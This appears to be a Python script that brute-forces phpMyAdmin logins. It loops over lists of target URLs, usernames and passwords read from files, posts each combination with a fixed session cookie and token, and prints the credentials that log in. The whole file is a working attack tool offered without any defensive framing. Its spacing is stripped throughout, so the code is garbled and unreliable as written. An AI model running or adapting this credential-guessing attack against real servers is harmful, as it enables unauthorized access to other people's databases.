#!usr/bin/envpython #encoding:utf-8 importrequests headers={'Content-Type':'application/x-www-form-urlencoded', 'User-Agent':'Mozilla/5.0(X11;Linuxx86_64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/63.0.3239.132Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Cookie':'pmaCookieVer=5;pma_lang=zh_CN;pma_collation_connection=utf8mb4_unicode_ci;phpMyAdmin=vo6nt8q71hsv93fb9a7c5b5oot2215gq' } defattack(host,username,password): host=host+"/index.php" payload={'pma_username':username, 'pma_password':password, 'server':'1', 'target':'index.php', 'token':'bf8e4192569617d39070c5739cd1776f'} try: html=requests.post(host,headers=headers,data=payload).text if"themes/pmahomme/img/logo_right.png"inhtml: print"[-]%s-%s"%(username,password) else: print"[+]%s-%s-%s"%(host,username,password) exceptExceptionase: pass withopen('./url.txt','r')asurl: host_t=url.readlines() withopen('./username.txt','r')asusername: username_t=username.readlines() withopen('./password.txt','r')aspassword: password_t=password.readlines() forhinhost_t: host=h.strip() foruinusername_t: username=u.strip() forpinpassword_t: password=p.strip() attack(host,username,password)